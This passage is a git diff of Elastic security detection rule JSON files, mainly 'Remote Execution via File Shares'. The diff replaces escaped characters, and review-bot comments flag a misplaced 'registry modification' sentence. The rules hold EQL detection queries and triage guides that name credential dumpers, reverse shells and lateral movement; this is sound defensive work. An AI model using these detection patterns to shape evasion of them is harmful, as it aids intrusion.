This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : \"exe\"] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_107.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_107.json index 6cf3b02eb30..f2eca12afae 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_107.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for 
suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. 
Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : \"exe\"] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_108.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_108.json index 5bac2cb0a57..e481567478d 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_108.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for 
suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. 
Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and \n process.pid == 4 and (file.extension : \"exe\" or file.Ext.header_bytes : \"4d5a*\")] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_109.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_109.json index 161052018e4..f8076dc1bd3 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_109.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_109.json 
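Review bot: The new `+ "note"` line keeps a sentence that does not fit this rule: `Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.` — "Remote Execution via File Shares" involves no registry change (the query below watches PID 4 writing an executable to a share, then that path starting), so the wording appears carried over from a registry-focused guide. Suggest `...searching for login events (for example, 4624) to the target host around the time the executable was written to the share.` The same sentence is present in the identical `note` hunks for the other versions of this rule in this diff, and since these files look like synced copies of the upstream rule source, the fix should land upstream so it is not overwritten on the next release; the `\u003e`/`\u0026` to `>`/`&` change itself is only a serialization difference and is fine.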
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for 
suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. 
Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and \n process.pid == 4 and (file.extension : \"exe\" or file.Ext.header_bytes : \"4d5a*\")] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "http://web.archive.org/web/20230329172636/https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_101.json b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_101.json index 10fe4866fdd..7ff93c936eb 100644 --- a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_101.json +++ b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_102.json b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_102.json index 207be73a11e..02963fa3cc6 100644 
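Review bot: The investigation guide in the new `note` string still tells the analyst to look for logon events "to the target host after the registry modification", but this rule keys on an executable being written to a share and then started, so that step reads as a copy-paste from a registry-based guide; suggest `after the executable was written to the share`. The rest of the guide (Osquery blocks, response steps) is consistent with the rule. The same sentence appears in what looks like the previous version of this rule, whose hunk tail is at the top of this chunk. If these versioned `_NNN.json` files are generated snapshots, the wording should be corrected in the rule source so the next exported version carries the fix rather than editing this file directly.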
--- a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_102.json
@@ -28,7 +28,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_103.json b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_103.json
index 8d6c465c812..4f842fb97a5 100644
--- a/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/abae61a8-c560-4dbd-acca-1e1438bff36b_103.json
@@ -38,7 +38,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_103.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_103.json
index 1e7685652b6..41b1dab8163 100644
--- a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_103.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_104.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_104.json
index 4730ff43ecd..2de6ce281d2 100644
--- a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_104.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_105.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_105.json
index 32168a90e56..a65c8374d70 100644
--- a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_105.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_106.json b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_106.json
index dbc9f246705..c021574aa28 100644
